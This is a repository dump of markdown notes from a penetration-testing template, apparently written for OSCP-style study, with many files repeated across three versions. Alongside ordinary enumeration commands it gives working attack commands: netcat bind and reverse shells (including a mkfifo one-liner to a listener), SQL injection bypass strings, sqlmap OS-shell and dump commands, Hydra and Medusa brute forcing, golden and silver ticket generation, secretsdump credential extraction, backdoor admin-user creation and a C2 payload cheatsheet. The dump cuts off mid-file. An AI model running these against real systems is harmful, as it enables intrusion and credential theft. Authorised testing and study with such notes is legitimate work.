4 | 5 | ## Impacket: 6 | 7 | - python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo 8 | 9 | 10 | # Linux: 11 | 12 | - cat /etc/crontab 13 | - cat /etc/anacrontab 14 | - cat /etc/frontal 15 | - cat /etc/anacron 16 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Hydra.md: -------------------------------------------------------------------------------- 1 | - hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22 2 | 3 | - hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22 4 | 5 | - hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Command Line: 2 | 3 | - systeminfo 4 | 5 | # PowerShell 6 | 7 | - Get-ComputerInfo 8 | - Get-ComputerInfo -Property "*version" 9 | - Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | - schtasks 4 | 5 | ## Impacket: 6 | 7 | - python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo 8 | 9 | 10 | # Linux: 11 | 12 | - cat /etc/crontab 13 | - cat /etc/anacrontab 14 | - cat /etc/frontal 15 | - cat /etc/anacron 16 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | # Linux Commands to run: 2 | 3 | - top 4 | - htop 5 | - ps -e 6 | - ps aux 7 | - ps aux | more 8 | - ps aux | less 9 | 10 | ## Finding processes 11 | 12 | - pgrep 13 | 14 | ## Terminating a Process 15 | 16 | - kill 17 | - kill -9 PID 18 | - pkill processName 19 | - killall 20 | 21 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | - schtasks 4 | 5 | ## Impacket: 6 | 7 | - python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo 8 | 9 | 10 | # Linux: 11 | 12 | - cat /etc/crontab 13 | - cat /etc/anacrontab 14 | - cat /etc/frontal 15 | - cat /etc/anacron 16 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md: -------------------------------------------------------------------------------- 1 | # When in Doubt...Always Enumerate! Enumeration is the key! 2 | 3 | ## Resources 4 | - http://www.0daysecurity.com/penetration-testing/enumeration.html 5 | - Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html 6 | - https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-methodology 7 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## For all Linux Distro's: 2 | 3 | - uname -a 4 | - cat /etc/issue 5 | - cat /proc/version 6 | 7 | ## PowerShell 8 | 9 | - $PSVersionTable 10 | 11 | Obtaining Systems Enviorment Variables: 12 | 13 | - Get-ChildItem -Path Env: 14 | 15 | ## Debian: 16 | 17 | - dmesg | grep Linux 18 | 19 | ## RedHat: 20 | 21 | - rpm -q kernel 22 | 23 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## For all Linux Distro's: 2 | 3 | - uname -a 4 | - cat /etc/issue 5 | - cat /proc/version 6 | 7 | ## PowerShell 8 | 9 | - $PSVersionTable 10 | 11 | Obtaining Systems Enviorment Variables: 12 | 13 | - Get-ChildItem -Path Env: 14 | 15 | 16 | ## Debian: 17 | 18 | - dmesg | grep Linux 19 | 20 | ## RedHat: 21 | 22 | - rpm -q kernel 23 | 24 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md: -------------------------------------------------------------------------------- 1 | # "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" 2 | 3 | ## tcpdump: 4 | 5 | - tcpdump -i eth0 6 | - tcpdump -c -i eth0 7 | - tcpdump -A -i eth0 8 | - tcpdump -w 0001.pcap -i eth0 9 | - tcpdump -r 0001.pcap 10 | - tcpdump -n -i eth0 11 | - tcpdump -i eth0 port 22 12 | - tcpdump -i eth0 -src 172.21.10.X 13 | - tcpdump -i eth0 -dst 172.21.10.X 14 | 15 | ## Other tools: 16 | 17 | Tshark (Command Line Wireshark) 18 | Wireshark 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md: -------------------------------------------------------------------------------- 1 | # Domain Discovery 2 | 3 | Sublis3r: 4 | 5 | - Sublist3r -d www.example.com 6 | - Sublist3r -v -d www.example.com -p 80,443 7 | 8 | Subfinder: 9 | - subfinder -d megacorpone.com 10 | 11 | OWASP AMASS: 12 | 13 | - amass enum -d www.example.com 14 | - amass intel -whois -d www.example.com 15 | - amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 16 | - amass intel -ipv4 -whois -d www.example.com 17 | - amass intel -ipv6 -whois -d www.example.com -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md: -------------------------------------------------------------------------------- 1 | ## Testing for Amsi Bypass: 2 | 3 | - https://github.com/rasta-mouse/AmsiScanBufferBypass 4 | 5 | ## Amsi-Bypass-Powershell 6 | 7 | - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 8 | 9 | ## Resources: 10 | 11 | - https://blog.f-secure.com/hunting-for-amsi-bypasses/ 12 | - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 13 | - https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans 14 | - https://slaeryan.github.io/posts/falcon-zero-alpha.html -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypass Windows Amsi.md: -------------------------------------------------------------------------------- 1 | ## Testing for Amsi Bypass: 2 | 3 | - https://github.com/rasta-mouse/AmsiScanBufferBypass 4 | 5 | ## Amsi-Bypass-Powershell 6 | 7 | - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 8 | 9 | ## Resources: 10 | 11 | - https://blog.f-secure.com/hunting-for-amsi-bypasses/ 12 | - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 13 | - https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans 14 | - https://slaeryan.github.io/posts/falcon-zero-alpha.html -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | View your current user: 2 | 3 | - whoami 4 | 5 | View information about the current user: 6 | 7 | - net user afsimmons 8 | 9 | - net user afsimmons /domain (For a domain user) 10 | 11 | View Local Groups: 12 | 13 | - net localgroup 14 | - net localgroup Administrators 15 | 16 | Add a new user: 17 | 18 | - net user afsimmons enterpasswordhere /add 19 | 20 | Add a user in a localgroup: 21 | 22 | - net localgroup Administrators afsimmons 23 | 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md: -------------------------------------------------------------------------------- 1 | - medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 2 | 3 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp 4 | 5 | - medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 6 | 7 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222 8 | 9 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md: -------------------------------------------------------------------------------- 1 | - medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 2 | 3 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp 4 | 5 | - medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 6 | 7 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222 8 | 9 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md: -------------------------------------------------------------------------------- 1 | ## Enumerating Linux Users 2 | 3 | - cat /etc/passwd 4 | - less etc/passwd 5 | - getent passwd | awk -F: '{ print $1}' 6 | - cut -d: -f1 /etc/passwd 7 | - awk –F: ‘{ print $1}’ /etc/passwd 8 | - getent parrwd {1000..6000} 9 | 10 | ## enumerating Users Permissions 11 | 12 | - id 13 | - id -nG 14 | - getent group 15 | 16 | ## Enumerating Linux Groups 17 | 18 | - groups 19 | - less /etc/group 20 | - getent groups 21 | - getent group | awk -F: '{ print $1}' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | View your current user: 2 | 3 | - whoami 4 | 5 | View information about the current user: 6 | 7 | - net user afsimmons 8 | 9 | - net user afsimmons /domain (For a domain user) 10 | 11 | View Local Groups: 12 | 13 | - net localgroup 14 | - net localgroup Administrators 15 | 16 | Add a new user: 17 | 18 | - net user afsimmons enterpasswordhere /add 19 | 20 | Add a user in a localgroup: 21 | 22 | - net localgroup Administrators afsimmons 23 | 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Medusa.md: -------------------------------------------------------------------------------- 1 | - medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 2 | 3 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp 4 | 5 | - medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 6 | 7 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222 8 | 9 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md: -------------------------------------------------------------------------------- 1 | Testing for Bypasses: 2 | 3 | ' or 1=1 LIMIT 1 -- 4 | ' or 1=1 LIMIT 1 -- - 5 | ' or 1=1 LIMIT 1# 6 | 'or 1# 7 | ' or 1=1 -- 8 | ' or 1=1 -- - 9 | 10 | # SQLMAP 11 | 12 | ## sqlmap crawl 13 | sqlmap -u http://172.21.0.0 --crawl=1 14 | 15 | ## sqlmap dump database 16 | sqlmap -u http://172.21.0.0 --dbms=mysql --dump 17 | 18 | ## sqlmap shell 19 | sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell 20 | 21 | # SQLI 22 | 23 | Testing for a row: 24 | 25 | - http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/SQL Injection.md: -------------------------------------------------------------------------------- 1 | Testing for Bypasses: 2 | 3 | ' or 1=1 LIMIT 1 -- 4 | ' or 1=1 LIMIT 1 -- - 5 | ' or 1=1 LIMIT 1# 6 | 'or 1# 7 | ' or 1=1 -- 8 | ' or 1=1 -- - 9 | 10 | # SQLMAP 11 | 12 | ## sqlmap crawl 13 | sqlmap -u http://172.21.0.0 --crawl=1 14 | 15 | ## sqlmap dump database 16 | sqlmap -u http://172.21.0.0 --dbms=mysql --dump 17 | 18 | ## sqlmap shell 19 | sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell 20 | 21 | # SQLI 22 | 23 | Testing for a row: 24 | 25 | - http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md: -------------------------------------------------------------------------------- 1 | ## Source: 2 | 3 | https://github.com/BloodHoundAD/BloodHound 4 | 5 | ## Pre-Compiled Binaries 6 | 7 | https://github.com/BloodHoundAD/BloodHound/releases 8 | 9 | ## SharpHound: 10 | 11 | https://github.com/BloodHoundAD/SharpHound3 12 | 13 | ## Bloodhound for python 14 | Note: Only compatiable with BloodHound 3.0 or newer 15 | 16 | https://github.com/fox-it/BloodHound.py 17 | 18 | 19 | ## Gather Data 20 | 21 | - import-module .\sharphound.ps1 22 | - invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/SQL Injection.md: -------------------------------------------------------------------------------- 1 | Testing for Bypasses: 2 | 3 | ' or 1=1 LIMIT 1 -- 4 | ' or 1=1 LIMIT 1 -- - 5 | ' or 1=1 LIMIT 1# 6 | 'or 1# 7 | ' or 1=1 -- 8 | ' or 1=1 -- - 9 | 10 | # SQLMAP 11 | 12 | ## sqlmap crawl 13 | sqlmap -u http://172.21.0.0 --crawl=1 14 | 15 | ## sqlmap dump database 16 | sqlmap -u http://172.21.0.0 --dbms=mysql --dump 17 | 18 | ## sqlmap shell 19 | sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell 20 | 21 | # SQLI 22 | 23 | Testing for a row: 24 | 25 | - http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md: -------------------------------------------------------------------------------- 1 | ## Testing for Amsi Bypass: 2 | 3 | - https://github.com/rasta-mouse/AmsiScanBufferBypass 4 | 5 | ## Amsi-Bypass-Powershell 6 | 7 | - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 8 | 9 | ## Resources: 10 | 11 | - https://blog.f-secure.com/hunting-for-amsi-bypasses/ 12 | - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 13 | - https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans 14 | - https://slaeryan.github.io/posts/falcon-zero-alpha.html 15 | - https://www.hackingarticles.in/a-detailed-guide-on-amsi-bypass/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md: -------------------------------------------------------------------------------- 1 | 1. Understand who is going to be reading this and who is the target audience? 2 | 2. The report needs to clear that a non-technical person would understand 3 | 3. Report should include the following: 4 | 1. Executive Summary 5 | 2. Technical Summary 6 | 3. Detail Report of findings 7 | 4. Recommendations for remediation (If possible) 8 | 9 | 10 | 11 | Resources: 12 | 13 | - https://blog.zsec.uk/ltr101-pentest-reporting/ 14 | - https://github.com/juliocesarfort/public-pentesting-reports 15 | 16 | Public Pentesting Reports: 17 | 18 | - https://github.com/juliocesarfort/public-pentesting-reports -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md: -------------------------------------------------------------------------------- 1 | 1. Understand who is going to be reading this and who is the target audience? 2 | 2. The report needs to clear that a non-technical person would understand 3 | 3. Report should include the following: 4 | 1. Executive Summary 5 | 2. Technical Summary 6 | 3. Detail Report of findings 7 | 4. Recommendations for remediation (If possible) 8 | 9 | 10 | 11 | Resources: 12 | 13 | - https://blog.zsec.uk/ltr101-pentest-reporting/ 14 | - https://github.com/juliocesarfort/public-pentesting-reports 15 | 16 | Public Pentesting Reports: 17 | 18 | - https://github.com/juliocesarfort/public-pentesting-reports -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/BloodHound.md: -------------------------------------------------------------------------------- 1 | ## Source: 2 | 3 | https://github.com/BloodHoundAD/BloodHound 4 | 5 | ## Pre-Compiled Binaries 6 | 7 | https://github.com/BloodHoundAD/BloodHound/releases 8 | 9 | ## SharpHound: 10 | 11 | https://github.com/BloodHoundAD/SharpHound3 12 | 13 | ## Bloodhound for python 14 | Note: Only compatiable with BloodHound 3.0 or newer 15 | 16 | https://github.com/fox-it/BloodHound.py 17 | 18 | ## Install on Kali: 19 | 20 | apt install bloodhound 21 | 22 | ## Gather Data 23 | 24 | - import-module .\sharphound.ps1 25 | - invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md: -------------------------------------------------------------------------------- 1 | # Generate Silver Tickets with Impacket: 2 | - python3 ticketer.py -nthash -domain-sid -domain -spn 3 | - python3 ticketer.py -aesKey -domain-sid -domain -spn 4 | 5 | # Generate Golden Tickets: 6 | - python3 ticketer.py -nthash -domain-sid -domain 7 | - python3 ticketer.py -aesKey -domain-sid -domain 8 | 9 | # Credential Access with Secretsdump 10 | 11 | - impacket-secretsdump username@target-ip -dc-ip target-ip -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Impacket.md: -------------------------------------------------------------------------------- 1 | # Generate Silver Tickets with Impacket: 2 | - python3 ticketer.py -nthash -domain-sid -domain -spn 3 | - python3 ticketer.py -aesKey -domain-sid -domain -spn 4 | 5 | # Generate Golden Tickets: 6 | - python3 ticketer.py -nthash -domain-sid -domain 7 | - python3 ticketer.py -aesKey -domain-sid -domain 8 | 9 | # Credential Access with Secretsdump 10 | 11 | - impacket-secretsdump username@target-ip -dc-ip target-ip -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md: -------------------------------------------------------------------------------- 1 | Cannot use in the OSCP Exam. Fun to use on assessments. 2 | Note: Multirelay.py does not work in python3 since the UserDict library has been depricated 3 | 4 | 5 | # Source: https://github.com/lgandx/Responder 6 | 7 | ## Make changes to config to turn off services: 8 | 9 | nano /usr/share/responder/Responder.conf 10 | 11 | ## Starting Responder: 12 | 13 | - responder -I [Interface] -A 14 | - responder -I [Interface] -i [IP Address] or -e [External IP] -A 15 | 16 | ## Tools in Responder: 17 | 18 | Location: /usr/share/Responder/tools 19 | 20 | ## Check for systems with SMB Signing not enabled 21 | 22 | - python3 RunFinger.py -i 172.21.0.0/24 23 | 24 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md: -------------------------------------------------------------------------------- 1 | Cannot use in the OSCP Exam. Fun to use on assessments. 2 | Note: Multirelay.py does not work in python3 since the UserDict library has been depricated 3 | 4 | 5 | # Source: https://github.com/lgandx/Responder 6 | 7 | ## Make changes to config to turn off services: 8 | 9 | nano /usr/share/responder/Responder.conf 10 | 11 | ## Starting Responder: 12 | 13 | - responder -I [Interface] -A 14 | - responder -I [Interface] -i [IP Address] or -e [External IP] -A 15 | 16 | ## Tools in Responder: 17 | 18 | Location: /usr/share/Responder/tools 19 | 20 | ## Check for systems with SMB Signing not enabled 21 | 22 | - python3 RunFinger.py -i 172.21.0.0/24 23 | 24 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md: -------------------------------------------------------------------------------- 1 | # Generate Silver Tickets with Impacket: 2 | - python3 ticketer.py -nthash -domain-sid -domain -spn 3 | - python3 ticketer.py -aesKey -domain-sid -domain -spn 4 | 5 | # Generate Golden Tickets: 6 | - python3 ticketer.py -nthash -domain-sid -domain 7 | - python3 ticketer.py -aesKey -domain-sid -domain 8 | 9 | # Credential Access with Secretsdump 10 | 11 | - impacket-secretsdump username@target-ip -dc-ip target-ip -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Netcat Tips.md: -------------------------------------------------------------------------------- 1 | ## Fundamentals: 2 | 3 | Connect to a netcat client: 4 | - rlwrap nc [IP Address] [port] 5 | 6 | Connect to a netcat Listener: 7 | 8 | - rlwrap nc -lvp [Localport] 9 | 10 | More info on rlwrap: https://linux.die.net/man/1/rlwrap 11 | 12 | ## Backdoor Shells: 13 | 14 | Linux: 15 | 16 | - rlwrap nc [Your IP Address] -e /bin/sh 17 | - rlwrap nc [Your IP Address] -e /bin/bash 18 | - rlwrap nc [Your IP Address] -e /bin/zsh 19 | - rlwrap nc [Your IP Address] -e /bin/ash 20 | 21 | 22 | Windows: 23 | 24 | - rlwrap nc -lv [localport] -e cmd.exe 25 | 26 | Linux netcat reverse shell: 27 | 28 | - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md: -------------------------------------------------------------------------------- 1 | ## Fundamentals: 2 | 3 | Connect to a netcat client: 4 | - rlwrap nc [IP Address] [port] 5 | 6 | Connect to a netcat Listener: 7 | 8 | - rlwrap nc -lvp [Localport] 9 | 10 | More info on rlwrap: https://linux.die.net/man/1/rlwrap 11 | 12 | ## Backdoor Shells: 13 | 14 | Linux: 15 | 16 | - rlwrap nc [Your IP Address] -e /bin/sh 17 | - rlwrap nc [Your IP Address] -e /bin/bash 18 | - rlwrap nc [Your IP Address] -e /bin/zsh 19 | - rlwrap nc [Your IP Address] -e /bin/ash 20 | 21 | 22 | Windows: 23 | 24 | - rlwrap nc -lv [localport] -e cmd.exe 25 | 26 | Linux netcat reverse shell: 27 | 28 | - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Netcat Tips.md: -------------------------------------------------------------------------------- 1 | ## Fundamentals: 2 | 3 | Connect to a netcat client: 4 | - rlwrap nc [IP Address] [port] 5 | 6 | Connect to a netcat Listener: 7 | 8 | - rlwrap nc -lvp [Localport] 9 | 10 | More info on rlwrap: https://linux.die.net/man/1/rlwrap 11 | 12 | ## Backdoor Shells: 13 | 14 | Linux: 15 | 16 | - rlwrap nc [Your IP Address] -e /bin/sh 17 | - rlwrap nc [Your IP Address] -e /bin/bash 18 | - rlwrap nc [Your IP Address] -e /bin/zsh 19 | - rlwrap nc [Your IP Address] -e /bin/ash 20 | 21 | 22 | Windows: 23 | 24 | - rlwrap nc -lv [localport] -e cmd.exe 25 | 26 | Linux netcat reverse shell: 27 | 28 | - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## Debian: 2 | 3 | - ls -alh /usr/bin/ 4 | - ls -alh /sbin/ 5 | - dpkg -l 6 | - ls -alh /var/cache/apt/archivesO 7 | - ls /usr/share/applications | awk -F '.desktop' ' { print $1}' - 8 | 9 | ## RedHat: 10 | 11 | - rpm -qa 12 | - ls -alh /var/cache/yum/ 13 | 14 | 15 | ## BSD: 16 | 17 | - pkg_info 18 | 19 | ## Gentoo: 20 | 21 | - equery list 22 | - eix -I 23 | 24 | ## Arch Linux: 25 | 26 | - pacman -Q 27 | 28 | 29 | ## Bash Script: 30 | 31 | ``` 32 | #!/bin/bash 33 | IFS=: read -ra dirs_in_path <<< "$PATH" 34 | 35 | for dir in "${dirs_in_path[@]}"; do 36 | for file in "$dir"/*; do 37 | [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}" 38 | done 39 | done 40 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Linux_.md: -------------------------------------------------------------------------------- 1 | ## Enumerating Linux Users 2 | 3 | - cat /etc/passwd 4 | - less etc/passwd 5 | - getent passwd | awk -F: '{ print $1}' 6 | - cut -d: -f1 /etc/passwd 7 | - awk –F: ‘{ print $1}’ /etc/passwd 8 | - getent parrwd {1000..6000} 9 | 10 | ## Enumerating Users Permissions 11 | 12 | - id 13 | - id -nG 14 | - getent group 15 | 16 | ## Enumerating Linux Groups 17 | 18 | - groups 19 | - less /etc/group 20 | - getent groups 21 | - getent group | awk -F: '{ print $1}' 22 | 23 | ## Creating a user in linux: 24 | 25 | - adduser afsimmons # (alt, use full path: /usr/sbin/adduser afsimmons) 26 | - passwd afsimmons 27 | - useradd -G {group-name} afsimmons 28 | 29 | - /usr/sbin/usermod -aG sudo afsimmons -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## Debian: 2 | 3 | - ls -alh /usr/bin/ 4 | - ls -alh /sbin/ 5 | - dpkg -l 6 | - ls -alh /var/cache/apt/archivesO 7 | - ls /usr/share/applications | awk -F '.desktop' ' { print $1}' - 8 | 9 | ## RedHat: 10 | 11 | - rpm -qa 12 | - ls -alh /var/cache/yum/ 13 | 14 | 15 | ## BSD: 16 | 17 | - pkg_info 18 | 19 | ## Gentoo: 20 | 21 | - equery list 22 | - eix -I 23 | 24 | ## Arch Linux: 25 | 26 | - pacman -Q 27 | 28 | 29 | ## Bash Script: 30 | 31 | ``` 32 | #!/bin/bash 33 | IFS=: read -ra dirs_in_path <<< "$PATH" 34 | 35 | for dir in "${dirs_in_path[@]}"; do 36 | for file in "$dir"/*; do 37 | [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}" 38 | done 39 | done 40 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## What does the targets network look like: 2 | 3 | - /sbin/ifconfig -a 4 | - /sbin/ip addr 5 | - cat /etc/network/interfaces 6 | - cat /etc/sysconfig/network 7 | - ip addr show 8 | 9 | ## Network configuration Settings: 10 | 11 | - cat /etc/resolv.conf 12 | - cat /etc/sysconfig/network 13 | - cat /etc/networks 14 | - iptables -L 15 | - hostname 16 | - dnsdomainname 17 | 18 | ## List all current connections 19 | 20 | - lsof -i 21 | - lsof -i :80 22 | - grep 80 /etc/services 23 | - netstat -antup 24 | - netstat -antpx 25 | - netstat -tulpn 26 | - chkconfig --list 27 | - chkconfig --list | grep 3:on 28 | 29 | ## Check the routes: 30 | 31 | - arp -e 32 | - route 33 | - route -n 34 | - /sbin/route -nee 35 | - ip route list 36 | 37 | References: 38 | 39 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Installation: 2 | sudo apt update&&sudo apt install gnome-terminal 3 | git clone https://github.com/t3l3machus/Villain 4 | cd ./Villain 5 | pip3 install -r requirements.txt 6 | 7 | # Generating Payloads 8 | 9 | ## Main Logic: 10 | 11 | ``` 12 | generate payload= lhost= [ obfuscate encode ] 13 | ``` 14 | 15 | - 16 | 17 | ## Session Defender 18 | Villain has a function that inspects user issued shell commands for input that may cause a backdoor shell session to hang (e.g., unclosed single/double quotes or backticks, commands that may start a new interactive session within the current shell and more). Use the `cmdinspector` command to turn that feature on/off. 19 | 20 | Usage: 21 | ``` 22 | cmdinspector 23 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md: -------------------------------------------------------------------------------- 1 | ## Empire C2: 2 | 3 | Github: https://github.com/BC-SECURITY/Empire 4 | 5 | In 